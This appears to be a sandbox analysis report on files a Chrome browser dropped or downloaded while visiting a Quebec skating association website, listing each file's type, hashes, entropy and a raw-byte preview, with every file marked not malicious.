                  Preview:L..................F.@.. ...$+.,.....{b.\c......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.I*Z.d....B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V*Z.d....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.V*Z.d....M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.V*Z.d...........................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V*Z.d.....#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............x.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jan 10 11:38:49 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                  Category:dropped
                  Size (bytes):2681
                  Entropy (8bit):3.989578870339899
                  Encrypted:false
                  SSDEEP:
                  MD5:5D2DEB76F1993FC881D4C2FB2C9C9881
                  SHA1:9B330ED231A98151251CD59E931F4E15EB3D92A7
                  SHA-256:94B9318027D099C67E0C95C06502381E9A7A129CE8A48A904C1460C729B3EB04
                  SHA-512:F9FE8CFCC9FE12EC061ED9AF53D22E31FD9C446119BF76A60EA5FDB410DAE03262E98611BFE2A9BCBEA85969838FF4495873E47F677307FD9F24654CB2066FC5
                  Malicious:false
                  Reputation:unknown
                  Preview:L..................F.@.. ...$+.,......?.\c......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.I*Z.d....B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V*Z.d....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.V*Z.d....M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.V*Z.d...........................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V*Z.d.....#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............x.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (2343)
                  Category:downloaded
                  Size (bytes):52916
                  Entropy (8bit):5.51283890397623
                  Encrypted:false
                  SSDEEP:
                  MD5:575B5480531DA4D14E7453E2016FE0BC
                  SHA1:E5C5F3134FE29E60B591C87EA85951F0AEA36EE1
                  SHA-256:DE36E50194320A7D3EF1ACE9BD34A875A8BD458B253C061979DD628E9BF49AFD
                  SHA-512:174E48F4FB2A7E7A0BE1E16564F9ED2D0BBCC8B4AF18CB89AD49CF42B1C3894C8F8E29CE673BC5D9BC8552F88D1D47294EE0E216402566A3F446F04ACA24857A
                  Malicious:false
                  Reputation:unknown
                  URL:https://www.google-analytics.com/analytics.js
                  Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var n=this||self,p=function(a,b){a=a.split(".");var c=n;a[0]in c||"undefined"==typeof c.execScript||c.execScript("var "+a[0]);for(var d;a.length&&(d=a.shift());)a.length||void 0===b?c=c[d]&&c[d]!==Object.prototype[d]?c[d]:c[d]={}:c[d]=b};function q(){for(var a=r,b={},c=0;c<a.length;++c)b[a[c]]=c;return b}function u(){var a="ABCDEFGHIJKLMNOPQRSTUVWXYZ";a+=a.toLowerCase()+"0123456789-_";return a+"."}var r,v;.function aa(a){function b(k){for(;d<a.length;){var m=a.charAt(d++),l=v[m];if(null!=l)return l;if(!/^[\s\xa0]*$/.test(m))throw Error("Unknown base64 encoding at char: "+m);}return k}r=r||u();v=v||q();for(var c="",d=0;;){var e=b(-1),f=b(0),h=b(64),g=b(64);if(64===g&&-1===e)return c;c+=String.fromCharCode(e<<2|f>>4);64!=h&&(c+=String.fromCharCode(f<<4&240|h>>2),64!=g&&(c+=String.fromCharCode(h<<6&192|g)))}};var w={},y=function(a){w.TAGGING=w.TAGGING||[];w.TAGGING[a]=!0};var ba=Array.isArray,c
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 200x200, components 3
                  Category:dropped
                  Size (bytes):8562
                  Entropy (8bit):7.938162327654265
                  Encrypted:false
                  SSDEEP:
                  MD5:B89F3699C3E5838C6173F0705E2E6D20
                  SHA1:822C3E022E810F946A04B23264FC3F97E8765262
                  SHA-256:1613D6B8C874E3A3514CE26649BA20F42C097BEF4D228CE5AD77ED3CDCAFCA76
                  SHA-512:079A2C90314526065CA355A39DFC28474C145C172B2D023E71B5179D33B4F1E1967AA34C612E69A9D3428AB6054585F9111F2AB4274B66794DD744A73558056A
                  Malicious:false
                  Reputation:unknown
                  Preview:......JFIF..............Photoshop 3.0.8BIM.......h..(.bFBMD0a000aef01000097040000f10700004d0900004e0a00007a10000098170000251800007b190000571a000072210000.................................................................................................................................................."..............................................................1.. !.03AQq2@Ba....."R...#...$4b......................!..1Aq. "Qa...2Rr.....#03Bb..@....C.......................!1AQaq.... ....0..@P..........................je.........<..N.......L..0].t...x.:....f.7#.u|).&t..Z........L..0].t...7,..{.d.i.].a].;./q...C..Cg'o..w.Q...c.7.`n..G~......L..0].t.8M.3..y..%K..3....F.Zj.h..y..?....lep...h...5....G..#K...e`N[.G..thje...`.j..wj.......~..r.2..v..\.w..w#.z.7...|....em......UR.\CS,4L.m]..O...9...}....J-.....,.)...j...*..5[_|..52.D.v...4.?g..V.].x.D..MU!.;.....E.hz.=..j.6...je............j.+O..I...E.>..|..j..Nb4'.g.=..sM..CS,4L.m]5.........Oe...{e....\V.s...[<<.#.gW.
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 762x200, components 3
                  Category:dropped
                  Size (bytes):17716
                  Entropy (8bit):7.9383176660915025
                  Encrypted:false
                  SSDEEP:
                  MD5:79D33F86368BB8D49AF156CB7EF83BC9
                  SHA1:817841797CF05AFFE628C08696A02500FCBA4665
                  SHA-256:7043A67BF24E12604FF3BA822953544F7199BBE042B236D310021958FD37BF17
                  SHA-512:29EC1D3375F94E5BD9640595EC5D6355FE387D202D9D38909A406639092BB448546731626CA150C42AC8EB79F9C56333F8827E8BCF433F79879022C1E8860935
                  Malicious:false
                  Reputation:unknown
                  Preview:......Exif..II*.................Ducky.......<.....1http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2015 (Macintosh)" xmpMM:InstanceID="xmp.iid:419B5FD5279911E7AA1CE21F2EF9944A" xmpMM:DocumentID="xmp.did:419B5FD6279911E7AA1CE21F2EF9944A"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:419B5FD3279911E7AA1CE21F2EF9944A" stRef:documentID="xmp.did:419B5FD4279911E7AA1CE21F2EF9944A"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...........................................................................................................................
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=6], baseline, precision 8, 521x560, components 3
                  Category:downloaded
                  Size (bytes):93437
                  Entropy (8bit):7.228222116488067
                  Encrypted:false
                  SSDEEP:
                  MD5:714164FA3029A86FF0E9E00F9694FE59
                  SHA1:6914CEE1841F3719FE142830ABA8D71149EF76F7
                  SHA-256:01A43F07359B4035FA410AB69D6EC706DE8EC9DE490C33429A500445F22889CA
                  SHA-512:6C8448330296F81297D252B2253F30CBB82A0335EA3F5D684B0410C08436BD419F75799324247F8BC76DEFCFB02EA18F570AC09DC0FA6C665664D2F40D0EB88F
                  Malicious:false
                  Reputation:unknown
                  URL:https://arpaeq.ca/wp-content/uploads/sites/2/2017/07/CPA-Gasp%C3%A9.jpg
                  Preview:......JFIF.....`.`....G.Exif..MM.*.............&...b.............1.....&.....2...........i.....................V...F....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (9099), with CRLF line terminators
                  Category:downloaded
                  Size (bytes):9198
                  Entropy (8bit):5.12156917197049
                  Encrypted:false
                  SSDEEP:
                  MD5:68768A617F0065D4985C8253522F2CC5
                  SHA1:EB7FEB0673CD7FED6B49F87A8064303C40EAF885
                  SHA-256:277ED3C8149AEFC203F04D092D3D330F400076DC3AC44D1C02E760379CFD6686
                  SHA-512:95CB1BCF3BC21D353C58DF1E4F570C913E3F643A24CEA507A6C7870BC6570833F3B6DC3850AE28A4C59799060EC51912F7E85A6912C1850199C375AE7342862B
                  Malicious:false
                  Reputation:unknown
                  URL:https://arpaeq.ca/wp-content/themes/iron-man/ressources/js/jquery.mobile.custom.min.js?ver=6.5.4
                  Preview:/*! jQuery Mobile v1.4.5 | Copyright 2010, 2014 jQuery Foundation, Inc. | jquery.org/license */....(function(e,t,n){typeof define=="function"&&define.amd?define(["jquery"],function(r){return n(r,e,t),r.mobile}):n(e.jQuery,e,t)})(this,document,function(e,t,n,r){(function(e,n){e.extend(e.support,{orientation:"orientation"in t&&"onorientationchange"in t})})(e),function(e){e.event.special.throttledresize={setup:function(){e(this).bind("resize",n)},teardown:function(){e(this).unbind("resize",n)}};var t=250,n=function(){s=(new Date).getTime(),o=s-r,o>=t?(r=s,e(this).trigger("throttledresize")):(i&&clearTimeout(i),i=setTimeout(n,t-o))},r=0,i,s,o}(e),function(e,t){function p(){var e=s();e!==o&&(o=e,r.trigger(i))}var r=e(t),i="orientationchange",s,o,u,a,f={0:!0,180:!0},l,c,h;if(e.support.orientation){l=t.innerWidth||r.width(),c=t.innerHeight||r.height(),h=50,u=l>c&&l-c>h,a=f[t.orientation];if(u&&a||!u&&!a)f={"-90":!0,90:!0}}e.event.special.orientationchange=e.extend({},e.event.special.orientati
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (5268)
                  Category:dropped
                  Size (bytes):278515
                  Entropy (8bit):5.577531757572248
                  Encrypted:false
                  SSDEEP:
                  MD5:B7528F46C2CE875755D2B956188250F2
                  SHA1:45C27C879AB80D847ED5FA4C57FFD0B2F389EF6D
                  SHA-256:4717026759F4BCAFED7CFBAA9F7A30BC775484E6A36FF7EF719D4B5FAA600CB5
                  SHA-512:79AD9ED53AD0955F49436ECC1508E96C71DBA6DEDC287CF7F4947C428B11DA803D73711F3E3FC6E9187396A3B34EB0C17EC441241A84E1D80E7DC6653D358226
                  Malicious:false
                  Reputation:unknown
                  Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"2",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_ga_send","priority":5,"vtp_value":true,"tag_id":10},{"function":"__ogt_referral_exclusion","priority":5,"vtp_includeConditions":["list","arpaeq\\.ca"],"tag_id":12},{"function":"__ogt_session_timeout","priority":5,"vtp_sessionMinutes":30,"vtp_sessionHours":0,"tag_id":13},{"function":"__ogt_1p_data_v2","priority":5,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (42839), with no line terminators
                  Category:downloaded
                  Size (bytes):42839
                  Entropy (8bit):5.142640723743639
                  Encrypted:false
                  SSDEEP:
                  MD5:F59E3F4C0087B4D8DDC27BDD9C9AB92B
                  SHA1:FAC9B521062FEB5250C04D62128A8C3DDB312632
                  SHA-256:247184981EB6F698A94E431A83D68C6B0DF623CCE57B6E29DC5A6C11E23AA195
                  SHA-512:EAA92F05B0F29794C326D349882F1FA32115B81EA0C4C064ACACBAED7A6A9C80F1CAF2CB3C9CE64E3023D5D4497CD7665D6A83D7455B26878DE29390A83C2F44
                  Malicious:false
                  Reputation:unknown
                  URL:https://arpaeq.ca/wp-content/themes/iron-man/ressources/stylesheets/jquery.mCustomScrollbar.min.css?ver=1.0
                  Preview:.mCustomScrollbar{-ms-touch-action:pinch-zoom;touch-action:pinch-zoom}.mCustomScrollbar.mCS_no_scrollbar,.mCustomScrollbar.mCS_touch_action{-ms-touch-action:auto;touch-action:auto}.mCustomScrollBox{position:relative;overflow:hidden;height:100%;max-width:100%;outline:0;direction:ltr}.mCSB_container{overflow:hidden;width:auto;height:auto}.mCSB_inside>.mCSB_container{margin-right:30px}.mCSB_container.mCS_no_scrollbar_y.mCS_y_hidden{margin-right:0}.mCS-dir-rtl>.mCSB_inside>.mCSB_container{margin-right:0;margin-left:30px}.mCS-dir-rtl>.mCSB_inside>.mCSB_container.mCS_no_scrollbar_y.mCS_y_hidden{margin-left:0}.mCSB_scrollTools{position:absolute;width:16px;height:auto;left:auto;top:0;right:0;bottom:0;opacity:.75;filter:"alpha(opacity=75)";-ms-filter:"alpha(opacity=75)"}.mCSB_outside+.mCSB_scrollTools{right:-26px}.mCS-dir-rtl>.mCSB_inside>.mCSB_scrollTools,.mCS-dir-rtl>.mCSB_outside+.mCSB_scrollTools{right:auto;left:0}.mCS-dir-rtl>.mCSB_outside+.mCSB_scrollTools{left:-26px}.mCSB_scrollTools .mC
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Unicode text, UTF-8 text
                  Category:downloaded
                  Size (bytes):36162
                  Entropy (8bit):4.494446380386141
                  Encrypted:false
                  SSDEEP:
                  MD5:97A0F279BC9B458BE72AED31B31C6D26
                  SHA1:263F3DF80DD315194815F884395D07C140B51CF3
                  SHA-256:93F2F42C07931F36B39E477107FCFB4EA0414D1D723C58D00021C69515EE716A
                  SHA-512:FAE286041CAAEC1C93E79020AF79B839EC92C83841EF2B9E7DF7A21DBCF8559C4075B64973755984BA072C590EB51D8935CB5EC96689465C4AD51E6D8CCAD6F5
                  Malicious:false
                  Reputation:unknown
                  URL:https://arpaeq.ca/wp-content/themes/iron-man/ressources/js/jquery.liMarquee.js?ver=6.5.4
                  Preview:/*. * jQuery liMarquee v 4.6. *. * Copyright 2013, Linnik Yura | LI MASS CODE | http://masscode.ru. * http://masscode.ru/index.php/k2/item/44-limarquee. * Free to use. *. * Last Update 20.11.2014. */.(function ($) {..var methods = {...init: function (options) {....var p = {.....direction: 'left', //......... ........... ........ ........... .......... (left | right | up | down).....loop: -1, //......, ....... ... ..... .............. ........... "-1" ... ............ ............... .............scrolldelay: 0, //........ ........ . ............. ..... ...............scrollamount: 50, //........ ........ ........ (px/sec).....circular: true, //.... "true" - ...... ........... .....drag: true, //.... "true" - ........ .............. .....
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 800x100, components 3
                  Category:dropped
                  Size (bytes):82074
                  Entropy (8bit):7.967881332494957
                  Encrypted:false
                  SSDEEP:
                  MD5:4035E765AE1CF4DCC12E2E0B4C1B8A14
                  SHA1:74054C642F8AD43379B9F332E70A64D0547F75F7
                  SHA-256:965433597AE56ACBFF7141CB2A288E73029A0870AF19C9463632604AA97CA60D
                  SHA-512:B08F0CF767F7BBD309EC90F5660F96D31B3DCDAAB2DC79308793CCFAE7C4B321BC8FAB302406A71A5CE2B1B04B5A84AA733F77F817FEF07CD3C6223CD349B573
                  Malicious:false
                  Reputation:unknown
                  Preview:......Exif..II*.................Ducky.......d......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.a6a63968a, 2024/03/06-11:52:05 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="FAE8E0BF2F7EA03F03A3BDC77B7987FB" xmpMM:DocumentID="xmp.did:26C0672C689611EF95B7997ECC758225" xmpMM:InstanceID="xmp.iid:26C0672B689611EF95B7997ECC758225" xmp:CreatorTool="Adobe Photoshop 2024 Macintosh"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:6dffc647-225a-4542-a350-7402676f0c79" stRef:documentID="adobe:docid:photoshop:5276bc02-8dd6-2a4c-ac8b-79cb6b7cffa2"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...XICC_PROFILE......HLino....mntrRGB XYZ .........1..
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Web Open Font Format (Version 2), TrueType, length 8536, version 1.0
                  Category:downloaded
                  Size (bytes):8536
                  Entropy (8bit):7.972914684781256
                  Encrypted:false
                  SSDEEP:
                  MD5:99DF0B3718F6AF097123247BEA26AAAA
                  SHA1:7A2CECFC3E228DDEDE55D0C413C624AD24F03441
                  SHA-256:663DF0D94B1C52684D2943B0DC1454EEFEF8E17B98A80C8D997EDA06901D6CAC
                  SHA-512:7FF874E4064F2FD091EEB04109DA9C5628E82306D5ABFCDC15DF869E6EF1DFD7CF5DB21D89C40BDDB1D76C5106D03472DD1A070765823E60A65AE91717AA3F08
                  Malicious:false
                  Reputation:unknown
                  URL:https://fonts.gstatic.com/s/sintony/v15/XoHm2YDqR7-98cVUETMtug.woff2
                  Preview:wOF2......!X......Q|.. .............................x.X.`..<.......t..4..6.$..b. ..V..a....>E....0..}#*G.....m.......Q.......).<.Q[......Il,......#x4m.b.-.l/..NW.P"..............o.GkO{X..E)..D.|P.@P.P.\..r..t.vK.]..u_ow.......g&..3^.Q.J.D .......W..W..o..o.....u.d.w.....$l%..w..;w.`C.F.Z+.6..9...k/.J...b..K.1k,i'|.........b..8....=...T...S. uy....'1.8.....f.>.Mh.D...X...xJ)..,.P@..o._;.S):..C.U...Nv.L6#.H.d. I...ca.eP.D;<v8.~..fV..:..h.X.Q..P...cj.....*q...p._.Y*..>u...Qh.f%.....h...w..u.......A.....,.@[...h.[6.`x............j`......A?}.FH..xq2.~..$8..$...[.^}.]t..W....@s.4..s.............Fn`.oct.c..XcCl.5v.....kL..h.....k....Gm...Scf..F._.jt.5.w..%..i..J.M.{..g.{..n:.....P.P.hsyd.(...E........7l...........n=z.m.......m..n{..~...^..57FRf.K..9........c.....B.!,........P..6...t.......#.mS..=/......b$M.k..Zu~.qn...}vA...hN....6..2((...d>..~..."..u..%..[W.}.". .......L..w...1..\R.....Q'vI...f8...*.:.R.....o..~&...N...'.H.$.."HT.t.o...... Ym.g..m=H.$.}.
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (806)
                  Category:downloaded
                  Size (bytes):154300
                  Entropy (8bit):4.5475661370361244
                  Encrypted:false
                  SSDEEP:
                  MD5:D42BA4829D9FCC767DDE6B83379E20BD
                  SHA1:06273D1A5468D5F7095A8D6DDDAB3FEB103145FE
                  SHA-256:90782A6B31111ACEA5A5FD4CC3A1C54D8414BB40A99EBC59C5CBD42CD49A3D01
                  SHA-512:DD5E27A943667CB96C6C0ABA5611922C00581285602A455FBC807ECB670648DD3572FC5B852FBBF9F360A59219E5DA3426A0D66337A2E94A4611861AB3CF5605
                  Malicious:false
                  Reputation:unknown
                  URL:https://arpaeq.ca/wp-content/themes/iron-man/ressources/stylesheets/styles-2.css?ver=1736489832
                  Preview:@import url('https://fonts.googleapis.com/css?family=Sintony:400,700');./* FONT ICON */.@font-face {. font-family: 'Nucleo mini';. src: url('../fonts/nucleo-mini.eot') format('eot'), url('../fonts/nucleo-mini.woff') format('woff'), url('../fonts/nucleo-mini.ttf') format('truetype'), url('../fonts/nucleo-mini.svg#webfont') format('svg');. font-weight: normal;. font-style: normal; }..@font-face {. font-family: 'Font icon';. src: url('../fonts/TTC-icon.eot') format('eot'), url('../fonts/TTC-icon.woff') format('woff'), url('../fonts/TTC-icon.ttf') format('truetype'), url('../fonts/TTC-icon.svg#webfont') format('svg');. font-weight: normal;. font-style: normal; }..* {. margin: 0 auto;. padding: 0; }...reset-margin-padding, footer .adresse-nav .col-middle ul, footer .adresse-nav .col-right ul.icon-type, footer .adresse-nav .col-right ul.icon-type li, .page-index .bg-info #carousel-index .carousel-indicators, .page-index .events .liste-events .carousel-indicators, .page-index .membe
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:PNG image data, 244 x 100, 8-bit/color RGBA, non-interlaced
                  Category:downloaded
                  Size (bytes):5016
                  Entropy (8bit):7.838706691833788
                  Encrypted:false
                  SSDEEP:
                  MD5:17CB1C845116D187C331C34E909E61C5
                  SHA1:01A1B7CA4D10CBE4C94C527866F1008B3BC9DE59
                  SHA-256:6526D1C74FC2684E5EFC053A5E1A1295631BEE2A67E8E8560A471F8DF6DAF534
                  SHA-512:DA3C74EBB8D8C07A1E670CC1C1BEB2B2FAC2E5FC91FA7D20EF56E8F711F9B8DB0EF04AF673EBE8CD8D474729A965FBF5FF23024162976B8A17748FDB502C5B5D
                  Malicious:false
                  Reputation:unknown
                  URL:https://arpaeq.ca/wp-content/uploads/sites/2/2017/07/logo-patinage-quebec.png
                  Preview:.PNG........IHDR.......d......I......tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)" xmpMM:InstanceID="xmp.iid:17976DF36E5111E7B2FFDE33E259378D" xmpMM:DocumentID="xmp.did:17976DF46E5111E7B2FFDE33E259378D"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:17976DF16E5111E7B2FFDE33E259378D" stRef:documentID="xmp.did:17976DF26E5111E7B2FFDE33E259378D"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.`.Z....IDATx..]?o.....\.I.:$...Xn.T+..S..k,..Se*[.V.*..>..2..&...L..M.4.......IR]8..H.g..........."93z......3...
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1023x857, components 3
                  Category:downloaded
                  Size (bytes):175656
                  Entropy (8bit):7.810802253495839
                  Encrypted:false
                  SSDEEP:
                  MD5:C3AFC5AAECC78AB9B0D2EA20A5A41F29
                  SHA1:7529F979B03E55C8009C2F3ECF50110017F6BBFD
                  SHA-256:16635994955A937B9B6B350592823278DE38A3A913A45218E4C0B82D12824821
                  SHA-512:566731AFBBE1A3A7D3E22302A329E86261224370FB940C1D3289185F519DF97E781BB36FFF894C7BEC9BC9D8FD5FD21FADDC8F065C6845FE1C960FE0A4D17A2F
                  Malicious:false
                  Reputation:unknown
                  URL:https://arpaeq.ca/wp-content/uploads/sites/2/2017/07/image-du-seminaire.jpg
                  Preview:......JFIF.....`.`.....C....................................................................C.......................................................................Y...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..J$..Q...y....9..Q.......*j+.U.u...5..........X......g5-...y........r..6w..........-.?...D{...a}..n.......Z....M.O....|>......}../.u...p...._..g.p...1....\.3Q...g..2.A.......x.A.H..a.RLP.b.......K....:......~....O..n?.....d.9..h..wn*....z..:.%..9.....+.......>..(.....C9....."',..!.jj*.X..!.....5...h.....J...h..G.b.U..h..8.e....5..X'..!.i.Q.A...9.....lO.!.
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1000x280, components 3
                  Category:dropped
                  Size (bytes):65241
                  Entropy (8bit):7.9782577824726975
                  Encrypted:false
                  SSDEEP:
                  MD5:392E3B2BE597E35924526D3FA7581B7D
                  SHA1:A222074C88A29A620448E7FDAECC321CD03A502E
                  SHA-256:FD03A727965F7D68FCBC1E7C13F3D0E7E68BF14995A63D0010AEED53F06F28D3
                  SHA-512:958EDDA8C93A51B019CE2C76E98C470589533915DD3E4A9276F15CD023CDC1B708ADA8F06ED16686D5A346C00E9DC477C7377E05B3E318F0B8A7CDA9C48E31EC
                  Malicious:false
                  Reputation:unknown
                  Preview:......Exif..II*.................Ducky.......6.....ehttp://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="7728AE284383AC082857A5D16B61C1D2" xmpMM:DocumentID="xmp.did:087D99BBD8CC11E4B524B7D110FF6083" xmpMM:InstanceID="xmp.iid:087D99BAD8CC11E4B524B7D110FF6083" xmp:CreatorTool="Adobe Photoshop CS6 Windows"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:516A66A8CBD8E4118E398BEF9463267C" stRef:documentID="xmp.did:516A66A8CBD8E4118E398BEF9463267C"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d........................................................... ... #######
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:PNG image data, 1563 x 1563, 8-bit/color RGBA, non-interlaced
                  Category:dropped
                  Size (bytes):665302
                  Entropy (8bit):7.95299326403187
                  Encrypted:false
                  SSDEEP:
                  MD5:667D8ABBC0CDF2350B4C04025A944D09
                  SHA1:911A44A4CA364265F1BE42601F3AAED754EE4C6F
                  SHA-256:333C6636F3ABE5DB45AB78968397A658B0CCE7B679A9C0E8646BE34455392870
                  SHA-512:18A2A6BB73A687F2CE332399DD0F4CE82E17C0BB610F6BF674F3A6F86F1BC90E69BA3ABF0781C302C6469659BD94E137B952FAB6C27699B2E7ED2A8ADABA1C52
                  Malicious:false
                  Reputation:unknown
